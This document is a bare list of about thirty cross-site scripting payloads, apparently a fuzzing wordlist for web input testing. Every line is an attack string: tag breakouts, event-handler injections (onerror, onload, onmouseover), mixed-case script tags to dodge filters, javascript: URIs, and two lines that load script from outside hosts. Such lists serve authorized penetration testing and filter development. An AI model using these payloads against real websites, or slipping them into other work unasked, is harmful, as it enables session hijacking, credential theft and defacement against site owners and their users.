"></img><img src=x onerror=confirm(/XSS/)>/
</textarea><ScRiPt>prompt(/920065/)</ScRiPt//
"><iframe/onload=alert(document.domain)//
<iframe/onload=alert(document.domain)//!
</ScRiPt//"><iframe/onload=alert(document.domain)//
<a href=" https://google.com onmouseover=alert(1)>ClickHere</a>
<body/onhashchange=alert(1)><a href=#>ClickHere
<body onload=prompt(1);>
<marquee/onstart=confirm(1)>/
</script><svg onload=alert()>
\'-alert()//
<script>alert(1)</script>
<ScRipT>alert("1");</ScRipT>
<ScRiPt>alert(1)</sCriPt>
<svg/onload=prompt('1')>
"><svg/onload=alert(document.domain)>
<svg onload=alert(0)//
<svgonload=alert(0)>
<img src=x onerror=alert(1)>
</img><img src=x onerror=alert(domain)>
<script src=//14.rs></script>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
"><script>alert(String.fromCharCode(49))</script>
<img src=x onerror=alert(String.fromCharCode(49));>
"><img src=x onerror=alert(String.fromCharCode(49));>
"><svg/onload=alert(String.fromCharCode(49))>
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>”
<object data=javascript:confirm(1)>
<a href=javascript:confirm(1)>click here
<x onclick=confirm(1)>click here